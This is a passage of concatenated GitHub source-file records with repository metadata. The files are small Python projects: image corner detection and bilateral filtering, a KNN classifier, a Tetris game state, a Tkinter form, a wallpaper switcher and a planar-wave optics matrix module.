Fx2 = Fx2.sum()\n Fxy = Fxy.sum()\n Fy2 = Fy2.sum()\n\n C = np.array([[Fx2, Fxy],[Fxy, Fy2]]) #covariance matrix\n e,v = np.linalg.eig(C) #calc eigenvalues\n e = np.amin(e) #smallest eigenvalue = corner response\n\n if e > thresh:\n corners.append([x,y,e])\n\n corners.sort(key=itemgetter(2), reverse=True)\n\n corner_points = remove_eig(corners)\n corner_points_copy = list(corner_points)\n\n for i in range(len(corner_points)):\n\n x,y = corner_points[i]\n corner_points_copy.append([x,y])\n\n #Remove surrounding neighbors from list as they are not the maximum\n if [x+1, y] in corner_points_copy: corner_points_copy.remove([x+1, y])\n if [x+1,y+1] in corner_points_copy: corner_points_copy.remove([x+1, y+1])\n if [x + 1, y - 1] in corner_points_copy: corner_points_copy.remove([x+1, y-1])\n if [x, y + 1] in corner_points_copy: corner_points_copy.remove([x, y+1])\n if [x, y - 1] in corner_points_copy: corner_points_copy.remove([x, y-1])\n if [x - 1, y] in corner_points_copy: corner_points_copy.remove([x-1, y])\n if [x - 1, y - 1] in corner_points_copy: corner_points_copy.remove([x-1, y-1])\n if [x - 1, y + 1] in corner_points_copy: corner_points_copy.remove([x-1, y+1])\n\n shuffle(corner_points_copy)\n\n for i in range(int(len(corner_points_copy)*percentCorners)):\n x,y = corner_points_copy[i]\n cv2.circle(output,(x,y),2,(1,0,0),-1)\n\n\n return output\n\n\ndef main():\n\n\tl = ['bicycle.bmp','bird.bmp','dog.bmp','einstein.bmp','plane.bmp','toy_image.jpg']\n\tg = ['bicycle','bird','dog','einstein','plane','toy_image']\n\ts = \"data/\"\n\tfor i in range(0,len(l)):\n\t\tI = skimage.img_as_float(skimage.io.imread(s+l[i]))\n\n\t\tI = I.astype('float32')\n\t\tI_grey = cv2.cvtColor(I, cv2.COLOR_RGB2GRAY)\n\n\t\tsigma = 1\n\t\tkernel_size = 9\n\t\tH = np.array(gaussian1D(kernel_size, sigma))\n\t\tV = H\n\n\t\tdv = np.array([-1, 0, 1])\n\n\t\tH_dx = ndi.convolve1d(H, dv)\n\t\tV_dy = ndi.convolve1d(V, dv)\n\n\t\tG_x = ndi.convolve1d(I_grey, H_dx, 0)\n\t\tG_y = ndi.convolve1d(I_grey, V_dy, 1)\n\n\t\tthreshold = 0.55\n\n\t\tresult = find_corners(I_grey, G_x, G_y, threshold, I)\n\n\t\tpylab.imshow(result)\n\n\t\tskimage.io.imsave('houtput/'+g[i]+'.png', result.astype('float32'))\n\n\t\tpylab.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gskumar77c/corner-detection","sub_path":"harris.py","file_name":"harris.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74341975868","text":"orderCount = int(input())\r\n\r\nnumArr = []\r\nfor _ in range(orderCount):\r\n numArr.append(int(input()))\r\n\r\nstack = []\r\norderList = []\r\nascNum = 1\r\nisImpossible = False\r\nfor num in numArr:\r\n while isImpossible == False:\r\n if len(stack) == 0:\r\n if num >= ascNum:\r\n stack.append(ascNum)\r\n orderList.append(\"+\")\r\n ascNum += 1\r\n else:\r\n isImpossible = True\r\n break\r\n else:\r\n if num == stack[-1]:\r\n stack.pop()\r\n orderList.append(\"-\")\r\n break\r\n if num >= ascNum:\r\n stack.append(ascNum)\r\n orderList.append(\"+\")\r\n ascNum += 1\r\n elif num < ascNum:\r\n stack.pop()\r\n orderList.append(\"-\")\r\n\r\nif isImpossible == True:\r\n print(\"NO\")\r\nelse:\r\n for order in orderList:\r\n print(order)\r\n","repo_name":"KingPiggy/PS","sub_path":"Baekjoon/스택/1874번 스택 수열.py","file_name":"1874번 스택 수열.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8411900563","text":"from youtube_dl import YoutubeDL\n\n\n# Download two videos from Youtube\ndl = YoutubeDL()\ndl.download([\"https://www.youtube.com/watch?v=ZhKnSp2cX98\",\"https://www.youtube.com/watch?v=8MPbR6Cbwi4\"])\n\n# Search and then download an audio from Youtube videos\noptions = {\n \"format\": \"bestaudio/audio\"\n}\n\n\ndl = YoutubeDL(options)\ndl.download([\"https://www.youtube.com/watch?v=by3yRdlQvzs\"])\n\n#Search according to key words\noptions = {\n \"default_search\": \"ytsearch\",\n \"max_downloads\": 1\n}\ndl = YoutubeDL(options)\ndl.download([\"Mơ Vũ Cát Tường\"])\n\n# Search and then download an audio from Youtube video\noptions = {\n \"format\": \"bestaudio/audio\",\n \"default_search\": \"ytsearch\",\n \"max_downloads\": 1\n}\n\ndl = YoutubeDL(options)\ndl.download([\"We are young\"])\n","repo_name":"taanh99ams/taanh-lab-c4e15","sub_path":"Lab 2/HW_Lab2/study.py","file_name":"study.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10279088744","text":"import numpy as np\nfrom skimage import io\nfrom skimage.color import *\nfrom matplotlib import pyplot as plt\n\n# sorry it will take a long time.\n# i have given the result in out folder. maybe you can run this code in GPU.\ndef CartoonNizer_30988519(img):\n # Euclidean distance\n # Norm of two points\n def distance(x1, y1, x2, y2):\n return np.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\n # Difference of the pixels’values.\n def color_diff(c1, c2):\n return np.abs(c1 - c2)\n\n def gaussian(sigma_s, x):\n return ((np.exp(-(x * x) / (2 * (sigma_s ** 2)))) / (sigma_s * np.sqrt(2 * np.pi)))\n\n def color_distance(sigma_r, x):\n return (1 / (1 + (x ** 2 / sigma_r ** 2)))\n\n def bilateral_filter(src, filtered_img, diameter, x, y, sigma_s, sigma_r):\n\n hl = int(diameter / 2)\n filtered_temp = 0\n w_tot = 0\n for i in range(diameter):\n for j in range(diameter):\n neighbour_x = x - (hl - i)\n neighbour_y = y - (hl - j)\n\n if neighbour_x < 0:\n neighbour_x = 0\n if neighbour_y < 0:\n neighbour_y = 0\n\n if neighbour_x >= len(src):\n neighbour_x -= len(src)\n if neighbour_y >= len(src[0]):\n neighbour_y -= len(src[0])\n\n g_dist = gaussian(sigma_s, distance(x, y, neighbour_x, neighbour_y))\n\n d_col = color_distance(sigma_r, color_diff(src[neighbour_x][neighbour_y], src[x][y]))\n\n w = g_dist * d_col\n filtered_temp += src[neighbour_x][neighbour_y] * w\n\n w_tot += w\n\n filtered_temp = filtered_temp / w_tot\n\n filtered_img[x][y] = filtered_temp\n return filtered_img\n\n def my_filter(src, diameter, sigma_s, sigma_r):\n filtered_img = np.zeros(src.shape)\n\n for i in range(len(src)):\n for j in range(len(src[0])):\n bilateral_filter(src, filtered_img, diameter, i, j, sigma_s, sigma_r)\n\n return filtered_img\n\n # Process 3 channels\n filtered_R = my_filter(img[:, :, 0], 15, 150, 20)\n filtered_G = my_filter(img[:, :, 1], 15, 150, 20)\n filtered_B = my_filter(img[:, :, 2], 15, 150, 20)\n\n # Combine 3 channels\n bilateral = np.zeros([filtered_R.shape[0], filtered_R.shape[1], 3])\n bilateral[:, :, 0] = filtered_R[:, :]\n bilateral[:, :, 1] = filtered_G[:, :]\n bilateral[:, :, 2] = filtered_B[:, :]\n\n # Result from skimage function\n from skimage.restoration import denoise_bilateral as bilateralfilter\n bilateral_lib = bilateralfilter(img, win_size=15, sigma_color=20,\n sigma_spatial=150, bins=1000, multichannel=True)\n\n # Compare images\n fig, axes = plt.subplots(1, ncols=3, figsize=(15, 10))\n ax = axes.ravel()\n ax[0].imshow(img)\n ax[0].set_title(\"output of original image\")\n ax[1].imshow(bilateral / 255)\n ax[1].set_title(\"output of my bilateral\")\n ax[2].imshow(bilateral_lib)\n ax[2].set_title(\"output of function:bilateralfilter\")\n plt.show()\n io.imsave('./out/cartoon.jpg', bilateral)\n\n\nif __name__ == '__main__':\n # Read image\n img = io.imread(\"./test/aruto.jpg\")\n CartoonNizer_30988519(img)\n\n\n\n","repo_name":"lsunyusei/FIT-5221-cv","sub_path":"assignment2/CartoonNizer_30988519.py","file_name":"CartoonNizer_30988519.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8096987601","text":"\"\"\"Quick and dirty script to build a image of all of the tiles\"\"\"\nimport PIL.Image\nimport pathlib\nimport random\n\ndest = PIL.Image.new('RGB', (640, 480), None)\n\nsamples = list(pathlib.Path(\"data\").glob(\"*/tile*.png\"))\n\nx = 0\ny = 0\nwhile y < dest.height:\n file = random.choice(samples)\n print(f\"({x}, {y}) {file}\")\n src = PIL.Image.open(file).convert('RGB')\n dest.paste(src, (x, y))\n x += src.width\n if x > dest.width:\n x = 0\n y += src.height\ndest.save('samples.png')\n\n\n\n\n","repo_name":"dewiniaid/sigsolve","sub_path":"justforfun.py","file_name":"justforfun.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"37696050203","text":"import util\n\n\nclass Vehicle:\n def __init__(self, brand, type, color):\n self.brand = brand\n self.type = type\n self.color = color\n self.rent_per_day = \"\"\n print(f\"It is {self.brand} {self.type} and its color is {self.color}.\")\n\n def show_vehicle(self):\n show = \"You approach the vehicle. \" \\\n + self.open_door() \\\n + self.sit_and_switch_engine() \\\n + self.inspect_vehicle() \\\n + self.honk()\n return show\n\n def open_door(self):\n return \"You open a door.\\n\"\n\n def sit_and_switch_engine(self):\n return \"You sit and switch engine.\\n\"\n\n def inspect_vehicle(self):\n return \"You inspect lights, liquids and wipers.\\n\"\n\n def honk(self):\n return \"You honk. It sounds:'Meeeep, meeeeep'.\"\n\n def set_rent_per_day(self, rent_per_day):\n self.rent_per_day = rent_per_day\n\n def rent_price(self, days):\n days = util.validate_days(days)\n\n if 0 < days <= 7:\n return self.rent_per_day * days\n elif 7 < days <= 14:\n return self.rent_per_day * days * 0.9\n elif 14 < days <= 21:\n return self.rent_per_day * days * 0.8\n else:\n return self.rent_per_day * days * 0.7\n\n def rent_price_text(self, days):\n print(f\"Rent of {self.brand} {self.type} is \"\n f\"{self.rent_price(days):.0f} Kč for {days} days.\\n\\n\")\n\n\nclass Car(Vehicle):\n def __init__(self, brand, type, color, number_of_door, number_of_seats, fuel):\n self.number_of_door = number_of_door\n self.number_of_seats = number_of_seats\n self.fuel = fuel\n print(\"This vehicle is car.\")\n super().__init__(brand, type, color)\n print(f\"It has {self.number_of_door} door and \"\n f\"{self.number_of_seats} seats.\")\n print(f\"It runs on {self.fuel}.\")\n super().set_rent_per_day(600)\n\n\nclass Motorcycle(Vehicle):\n def __init__(self, brand, type, color, fuel):\n self.fuel = fuel\n print(\"This vehicle is motorcycle.\")\n super().__init__(brand, type, color)\n print(f\"It runs on {self.fuel}.\")\n super().set_rent_per_day(3500)\n\n def show_vehicle(self):\n show = \"You approach the vehicle. \" \\\n + self.sit_and_switch_engine() \\\n + self.inspect_vehicle() \\\n + self.honk()\n return show\n\n def inspect_vehicle(self):\n return \"You inspect lights and liquids.\\n\"\n\n\nclass Truck(Vehicle):\n def __init__(self, brand, type, color, fuel):\n self.fuel = fuel\n super().__init__(brand, type, color)\n super().set_rent_per_day(4000)\n\n def about_vehicle(self):\n print(\"This vehicle is car.\")\n super().about_vehicle()\n print(\"It has 2 doors and 2 seats.\")\n print(f\"It runs on {self.fuel}.\")\n\n def sit_and_switch_engine(self):\n return \"You climb into cab, sit and switch engine.\\n\"\n\n def honk(self):\n return \"You honk. It goes:'Traaaaa, traaaaaaaaaaaa.'\"\n\n\noctavia = Car(\"Škoda\", \"Octavia 1\", \"silver\", \"5\", \"5\", \"gasoline\")\nprint(octavia.show_vehicle())\noctavia.rent_price_text(5)\n\nkawasaki = Motorcycle(\"Kawasaki\", \"Ninja\", \"green\", \"gasoline\")\nprint(kawasaki.show_vehicle())\nkawasaki.rent_price_text(10)\n\nman = Truck(\"MAN\", \"TGX4X4\", \"white\", \"diesel\")\nprint(man.show_vehicle())\nman.rent_price_text(25)\n","repo_name":"Pavucinap/PyLadies","sub_path":"ulohy_09/vehicles.py","file_name":"vehicles.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8948472059","text":"from tkinter import *\nfrom tkinter import messagebox\nroot = Tk()\nroot.title('Diferencia finitas')\n# Para editar el tamanno de la interfaz\nroot.geometry('925x550+300+200')\nroot.configure(bg=\"#fff\")\nroot.resizable(False,False)\n\nimg = PhotoImage(file='logoAN.png')\nLabel(root,image=img,bg='white').place(x=50,y=50)\n\n# Declaracion donde ingresara los datos\nframe=Frame(root,width=380,height=430,bg=\"white\")\nframe.place(x=480,y=70)\n\n# Titulo del formulario\n# fg = color\n# bg = color de fondo\n# font = fuente\nheading=Label(frame,text='Texto',fg='#57a1f8',bg='white',font=('Microsoft Yahei UI Light',23,'bold'))\nheading.place(x=125,y=5)\n\n#===========================================================================================\n#Funciones limpieza\ndef user_input(e):\n user.delete(0,'end')\n\ndef code_input(e):\n code.delete(0,'end')\n\ndef number_input(e):\n number.delete(0,'end')\n\ndef num_input(e):\n num.delete(0,'end')\n\ndef method_input(e):\n method.delete(0,'end')\n\n\n#Funciones para rellanar\ndef user_info(e):\n input = user.get()\n if input =='':\n user.insert(0,'texto:')\n\ndef code_info(e):\n input1 = code.get()\n if input1 =='':\n code.insert(0,'texto2:')\n\n\ndef number_info(e):\n input2 = number.get()\n if input2 =='':\n number.insert(0,'texto3:')\n\n\ndef method_info(e):\n input4 = method.get()\n if input4 == '':\n method.insert(0,'texto4:')\n\ndef num_info(e):\n input3 = num.get()\n if input3 == '':\n num.insert(0,'texto5:')\n\n\n#Definicion de funcion para nueva GUI dentro de otra\n\n\ndef showPdf():\n input1 = user.get()\n input2 = code.get()\n input3 = number.get()\n input4 = method.get()\n input5 = num.get()\n\n print(len(input1))\n print(len(input2))\n\n\n #todo:realizar mas validaciones\n if len(input1)>1:\n screen = Toplevel(root)\n screen.title(\"PDF\")\n screen.geometry('925x500+300+200')\n screen.config(bg=\"white\")\n screen.resizable(False,False)\n\n\n #Elementos que llevara la GUI\n img = PhotoImage(file='logoPDF.png')\n Label(screen, image=img, bg='white').place(x=250, y=20)\n Label(screen, text='PDF generado', bg='#fff', font=('Calibri(Body)', 50, 'bold')).place(x=250,y=320)\n\n\n def regresar():\n screen.destroy()\n frame1 = Frame(screen, width=300, height=80, bg=\"white\")\n frame1.place(x=345, y=410)\n Button(frame1,width=30, pady=7, text='Introducir otra funcion', bg='#57a1f8', fg='white', border=0,command=regresar).place(x=0, y=0)\n\n screen.mainloop()\n\n# ===========================================================================================\n\n# Primer input\nuser = Entry(frame,width=25,fg='black',border=0,bg=\"white\",font=('Microsoft Yahei UI Light',11))\nuser.place(x=30,y=80)\nuser.insert(0,'texto')\nuser.bind('',user_input)\nuser.bind('',user_info)\n\n# Linea sobre el input\nFrame(frame,width=295,height=2,bg='black').place(x=25,y=107)\n\n# ===========================================================================================\n\n# Segundo input\ncode = Entry(frame,width=25,fg='black',border=0,bg=\"white\",font=('Microsoft Yahei UI Light',11))\ncode.place(x=30,y=150)\ncode.insert(0,'texto2:')\ncode.bind('',code_input)\ncode.bind('',code_info)\n\n# Linea sobre el input\nFrame(frame,width=295,height=2,bg='black').place(x=25,y=177)\n# ===========================================================================================\nnumber = Entry(frame,width=25,fg='black',border=0,bg=\"white\",font=('Microsoft Yahei UI Light',11))\nnumber.place(x=30,y=220)\nnumber.insert(0,'texto3:')\nnumber.bind('',number_input)\nnumber.bind('',number_info)\n\n# Linea sobre el input\nFrame(frame,width=295,height=2,bg='black').place(x=25,y=247)\n# ===========================================================================================\nmethod = Entry(frame,width=25,fg='black',border=0,bg=\"white\",font=('Microsoft Yahei UI Light',11))\nmethod.place(x=30,y=290)\nmethod.insert(0,'texto4:')\nmethod.bind('',method_input)\nmethod.bind('',method_info)\n\n# Linea sobre el input\nFrame(frame,width=295,height=2,bg='black').place(x=25,y=317)\n# ============================================================================================\nnum = Entry(frame,width=25,fg='black',border=0,bg=\"white\",font=('Microsoft Yahei UI Light',11))\nnum.place(x=30,y=350)\nnum.insert(0,'texto5:')\nnum.bind('',num_input)\nnum.bind('',num_info)\n\n# Linea sobre el input\nFrame(frame,width=295,height=2,bg='black').place(x=25,y=377)\n\n#============================================================================================\n\n# Button\nButton(frame,width=41,pady=7,text='Generar PDF',bg='#57a1f8',fg='white',border=0,command=showPdf).place(x=35,y=395)\n\n\n\n\n# Presentacion visual del codigo\nroot.mainloop()\n\n\n","repo_name":"Bryaan159/TkinterPython","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73348452347","text":"import threading\n\n\nclass Singleton(type):\n \"\"\"\n The singleton class to initialize a singleton object.\n \"\"\"\n _instance_lock = threading.Lock()\n\n def __init__(cls, *args, **kwargs):\n \"\"\"The singleton base class initializer\"\"\"\n cls._instance = None\n super(Singleton, cls).__init__(*args, **kwargs)\n\n def __call__(cls, *args, **kwargs):\n \"\"\"\n Writes classes where the instances behave like functions\n and can be called like a function\n \"\"\"\n if cls._instance is None:\n with Singleton._instance_lock:\n if cls._instance is None:\n cls._instance = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instance\n","repo_name":"openeuler-mirror/gala-anteater","sub_path":"anteater/utils/singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"21831640754","text":"\"\"\" Changes wallpapers \"\"\"\n\nimport os\nfrom ctypes import windll\n\ndef file_extension(file, *args):\n\t\"\"\" Returns the file extension of a given file \"\"\"\n\tchar = args[0] if args else '.'\n\ttry:\n\t\treturn file[-(list(file[::-1]).index(char)+1):]\n\texcept:\n\t\treturn '.png'\n\ndef usable_walls(path):\n\t\"\"\" Returns all the usable wallpapers \"\"\"\n\tusable_walls = []\n\tfor file in os.listdir(path):\n\t\tif file not in ('Current', 'refuse.txt') and file[:4] != 'used' and file[-3:] != 'lnk':\n\t\t\tusable_walls.append(file)\n\treturn usable_walls\n\ndef need_new_walls(path):\n\t\"\"\" Checks if there are less than 2 usable walls \"\"\"\n\treturn (True if len(usable_walls(path)) == 0 else False)\n\ndef move(root, cur):\n\t\"\"\" Moves the wallpaper from the root dir to the 'Current' dir \"\"\"\n\tnew_wall = usable_walls(root)[0]\n\ttry:\n\t\tcurrent_wall = usable_walls(cur)[0]\n\texcept IndexError:\n\t\topen(root+'Current/current.png','x')\n\t\tcurrent_wall = usable_walls(cur)[0]\n\tif current_wall[-4:] != '.txt':\n\t\tos.rename(cur+current_wall, root+'used'+new_wall[:-len(file_extension(new_wall))]+file_extension(current_wall))\n\telse:\n\t\tpass\n\tos.rename(root+new_wall, cur+'current'+file_extension(new_wall))\n\ndef set_wall(file):\n\t\"\"\" Sets the wall in 'Current' as wallpaper \"\"\"\n\twindll.user32.SystemParametersInfoW(20, 0, file, 0)\n\ndef delete_files(path):\n\t\"\"\" Deletes all wallpapers that were used \"\"\"\n\tflagged = []\n\tfor file in os.listdir(path):\n\t\tif file[:4] == 'used':\n\t\t\tflagged.append(file)\n\tfor file in flagged[::-1]:\n\t\tos.remove(path+'/'+file)\n","repo_name":"PhoenixFlame101/Wallpaper-Switcher","sub_path":"local_functions.py","file_name":"local_functions.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7615757294","text":"import io\nimport sys\nimport argparse\n\nsys.path.append('./lib/')\nfrom Rtree import Rtree\nfrom Point import Point\nfrom Service import Service\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"db\", help=\"database file to get map info from\", type=str)\nparser.add_argument(\"lat\", help=\"latitude of a place\", type=float)\nparser.add_argument(\"long\", help=\"longitude of a place\", type=float)\nparser.add_argument(\"size\", help=\"radius of a sector\", type=int)\nparser.add_argument(\"--typeR\", help=\"type of objects to look for\", type=str)\nargs = parser.parse_args()\n\ndef parse(fileNme):\n with io.open(fileNme, encoding='utf-8') as file:\n data = file.read().split('\\n')\n data = [field.split(';') for field in data[:-1]]\n return data \n\nrtree = Rtree(5)\ndata = parse('./data/' + args.db)\nfor service in data:\n rtree.insert(Service(Point(float(service[0]), float(service[1])), service[2], service[3], service[4], service[5]))\nprint('Rtree built')\n\nif args.typeR is not None:\n res, distance = rtree.findType(Point(args.lat, args.long), args.size, args.typeR)\n print('=====================')\n print('Name:', res.name)\n print('Type:', res.type)\n print('Subtype:', res.subtype)\n print('Address:', res.address)\n print('Distance: %.0f m' % distance)\nelse:\n res = rtree.find(Point(args.lat, args.long), args.size)\n for service in res:\n print('=====================')\n print('Name:', service.name)\n print('Type:', service.type)\n print('Subtype:', service.subtype)\n print('Address:', service.address)\n","repo_name":"Tariod/what-is-near","sub_path":"what-is-near.py","file_name":"what-is-near.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14676606484","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import StandardScaler\nimport numpy as np\nfrom sklearn.metrics import classification_report, confusion_matrix, f1_score\nfrom sklearn.model_selection import train_test_split\n\n\n\n# functions:\n\n# points the result of knn\ndef knn_f1score(n, insect_test_x, insect_test_y, insect_train_x, insect_train_y):\n #trains the algorithm\n classifier = KNeighborsClassifier(n_neighbors=n)\n classifier.fit(insect_train_x, insect_train_y)\n\n #predict the test dataset\n predicted = classifier.predict(insect_test_x)\n \n return (f1_score(insect_test_y, predicted, average='macro') * 100)\n\n#change the hours to minutes and it plus to the minutes column just having left 1 column for the time\ndef cleaning_data(insect_dataset):\n insect_dataset['Minutes'] = insect_dataset['Minutes'] + (insect_dataset['Hour'] * 60)\n del insect_dataset['Hour']\n return insect_dataset\n\n#separes the insect data as y and the remain datasets as x\ndef separating_x_and_y(insect_dataset):\n x = insect_dataset.iloc[:,:7]\n y = insect_dataset.loc[:,'Insect']\n return x, y\n\n#finding the best K for KNN algorithm\ndef finding_best_k(insect_test_x, insect_test_y, insect_train_x, insect_train_y):\n k_list:list = []\n score:list = []\n for i in range(1,20):\n k_list.append(i)\n score.append(knn_f1score(i, insect_test_x, insect_test_y, insect_train_x, insect_train_y))\n total_score = pd.DataFrame({'k_list' : k_list, 'SCORE':score})\n sorted_values_by_score = total_score.sort_values(by='SCORE', ascending=False)\n return int(sorted_values_by_score['k_list'].loc[sorted_values_by_score.index[0]])\n\n#predicts the test dataset\ndef predict_with_knn(k, x_train, y_train , insect_dataset_test):\n classifier = KNeighborsClassifier(n_neighbors=k)\n classifier.fit(x_train, y_train)\n y_predicted = classifier.predict(insect_dataset_test)\n return y_predicted\n\n\n\n\n# main:\n\n#imort the data\ninsect_dataset_train = pd.read_csv(\"train.csv\", index_col=0, parse_dates=True)\ninsect_dataset_test = pd.read_csv(\"test_x.csv\", index_col=0, parse_dates=True)\n\n#cleaning data\ninsect_dataset_train = cleaning_data(insect_dataset_train)\ninsect_dataset_test = cleaning_data(insect_dataset_test)\n\n#separates x and target from the test dataset for the train\nx, y = separating_x_and_y(insect_dataset_train)\n\n#randomize the insect dataset test and splits it due to havea training dataset for the KNN algorithm and another one for testing the KNN\ninsect_train_x, insect_test_x, insect_train_y, insect_test_y = train_test_split(x, y, test_size=0.2, random_state=2020)\n\n#find best k\nk = finding_best_k(insect_test_x, insect_test_y, insect_train_x, insect_train_y)\n\n#predicts dataset\nprediction = predict_with_knn(k, x, y, insect_dataset_test)\n\n#create the dataset from result\nresult = pd.DataFrame({'Test_index': insect_dataset_test.index, 'Prediction': prediction})\n\n#export the csv\nresult.to_csv('results.csv', index = False)","repo_name":"marc-1212/JOBarcelona_22_KNN","sub_path":"insectos_JOBarcelona_22.py","file_name":"insectos_JOBarcelona_22.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36271740870","text":"#pylint: disable=unused-import\nimport random\nfrom board import GameOver, TetrisBoard, WIDTH, HEIGHT\nfrom tetrominoes import tetrominoes as tets, tetlist, Tetromino, OrientedTetromino\n\nclass TetrisGameState:\n def __init__(self):\n self.score = 0\n self.board = TetrisBoard()\n self.tet_iq = list(range(7))\n random.shuffle(self.tet_iq)\n self.next_tet = tetlist[self.tet_iq.pop()]\n self.tet = tetlist[self.tet_iq.pop()]\n\n def next_tetromino(self):\n self.tet = self.next_tet\n try:\n self.next_tet = tetlist[self.tet_iq.pop()]\n except IndexError:\n self.tet_iq = list(range(7))\n random.shuffle(self.tet_iq)\n self.next_tet = tetlist[self.tet_iq.pop()]\n\n def make_move(self, orient, col) -> 'tuple[TetrisBoard, int, list[int]]':\n self.board.place_tetromino(self.tet, orient, col)\n cleared = self.board.get_cleared_lines()\n old_board = self.board.copy()\n if cleared:\n reward = self.board.score(cleared)\n self.board.remove_cleared_lines(cleared)\n else:\n reward = 0\n self.next_tetromino()\n return old_board, reward, cleared\n\n def generate_move_context(self, orient, col) -> 'tuple[bool, TetrisBoard, int, list[int]]':\n context = {}\n try:\n board, yi, cleared = self.board.test_place_tetromino(self.tet, orient, col)\n return False, board, yi, cleared\n except GameOver:\n return True, None, None, None\n return context\n\n def get_moves(self):\n for orient in range(self.tet.n_orientations()):\n for col in range(WIDTH):\n if col + self.tet[orient].width <= WIDTH:\n yield orient, col","repo_name":"murtaza64/sirtet","sub_path":"state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39059780677","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 23/08/2021\n\n@author: Michalina Pacholska\n\nThis module is designed to be expanded with different wave models, as long as\ntheir propagation can be described via matrix theory. Thus, the Planar Wave\nalso describes its propagation through the empty space and its refraction at\nthe boundary via matrix theory.\n\nEach propagation can be described in two representations:\n - a forward in space model, we call it a forward model (incoming and outgoing\n wave known on the one end of the boundary)\n - a forward in time model, we call it a backward model (incoming waves known\n on both ends of the boundary)\n\n In order to switch between the propagation models use `swap_waves`\n\n\"\"\"\n\nimport numpy as np\nimport wave as w\n\n\ndef change_basis(matrix: np.ndarray) -> np.ndarray:\n \"\"\" Change basis between forward and backward representations of propagation matrices.\n\n Args:\n matrix: a 2x2 matrix in any representation (forward or backward)\n\n Returns:\n a 2x2 matrix in the different representation than matrix\n\n \"\"\"\n result = np.empty_like(matrix, dtype=complex)\n result[0, 0] = matrix[0, 0] * matrix[1, 1] - matrix[0, 1] * matrix[1, 0]\n result[0, 1] = matrix[0, 1]\n result[1, 0] = -matrix[1, 0]\n result[1, 1] = 1.0\n return result / matrix[1, 1]\n\n\ndef identity_matrix(wave: w.PlanarWave = None):\n if wave is not None:\n matrix = np.zeros((2, 2, len(wave.k)), dtype=complex)\n else:\n matrix = np.zeros((2, 2, len(w.PlanarWave.k)), dtype=complex)\n matrix[0, 0] = 1\n matrix[1, 1] = 1\n return matrix\n\n\ndef single_propagation_matrix(k: float, n: complex, dz: float, backward: bool = False) -> np.ndarray:\n \"\"\"Create a propagation matrix for a single wavenumber k\n\n Args:\n k: wavenumber for which the matrix is created\n n: index of refraction of the layer\n dz: depth of the layer\n backward: if True use backward model (see the module documentation)\n\n Returns:\n 3D tensor of propagation matrices for all wavenumbers if dimensions (2, 2, # wavenumbers)\"\"\"\n matrix = np.zeros((2, 2), dtype=complex)\n phi = n * dz * k\n matrix[0, 0] = np.exp(1j * phi)\n if not backward:\n matrix[1, 1] = np.exp(-1j * phi)\n else:\n matrix[1, 1] = np.exp(1j * phi)\n return matrix\n\n\ndef propagation_matrix(\n n: complex,\n dz: float,\n backward: bool = False,\n wave: w.PlanarWave = None,\n) -> np.ndarray:\n \"\"\"\n Create 3D tensor of propagation matrices for all wavenumbers\n\n Args:\n n: index of refraction of the layer\n dz: depth of the layer\n backward: if True use backward model (see the module documentation)\n\n Returns:\n 3D tensor of propagation matrices for all wavenumbers if dimensions (2, 2, # wavenumbers)\n \"\"\"\n\n ks = w.PlanarWave.k\n if wave is not None:\n ks = wave.k\n matrix = np.zeros((2, 2, len(ks)), dtype=complex)\n phi = n * dz * ks\n matrix[0, 0, :] = np.exp(1j * phi)\n if not backward:\n matrix[1, 1, :] = np.exp(-1j * phi)\n else:\n matrix[1, 1, :] = np.exp(1j * phi)\n return matrix\n\n\ndef boundary_matrix(n1: complex, n2: complex, backward: bool = False) -> np.ndarray:\n \"\"\"\n Create a matrix of reflection on the boundary (wavenumber independent)\n\n Args:\n n1: index of refraction of the first layer\n n2: index of refraction of the second layer\n backward: if True use backward model (see the module documentation)\n\n Returns:\n matrix of reflection on the boundary, of dimensions (2, 2)\n \"\"\"\n\n matrix = np.zeros((2, 2), dtype=complex)\n if not backward:\n matrix[0, 0] = n1 + n2\n matrix[0, 1] = n2 - n1\n matrix[1, 0] = n2 - n1\n matrix[1, 1] = n1 + n2\n matrix = matrix / (2 * n2)\n else:\n matrix[0, 0] = 2 * n1\n matrix[0, 1] = n2 - n1\n matrix[1, 0] = n1 - n2\n matrix[1, 1] = 2 * n2\n matrix = matrix / (n1 + n2)\n return matrix\n\n\ndef reflection_matrix(r: float, backward: bool = False) -> np.ndarray:\n \"\"\"\n Create a matrix describing reflection given the reflectivity;\n does not include propagation through the material\n\n Args:\n r: 